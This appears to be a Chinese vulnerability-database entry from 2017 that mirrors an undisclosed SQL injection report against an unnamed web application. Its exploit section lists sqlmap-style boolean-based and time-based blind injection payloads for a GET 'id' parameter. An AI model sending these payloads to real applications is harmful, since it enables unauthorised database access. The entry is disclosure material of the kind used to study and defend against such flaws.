Copyright - 2006 - 2017 SQL Injection - Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1036958 漏洞类型
发布时间 2017-07-25 更新时间 2017-07-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2017070148
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Creditos: Informacion - Anonymous
Testeado: W10
Fecha: 25/07/2017
======
==PoFF:
--- Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=5 AND 6653=6653
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (comment)
    Payload: id=5 AND SLEEP(5)#
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#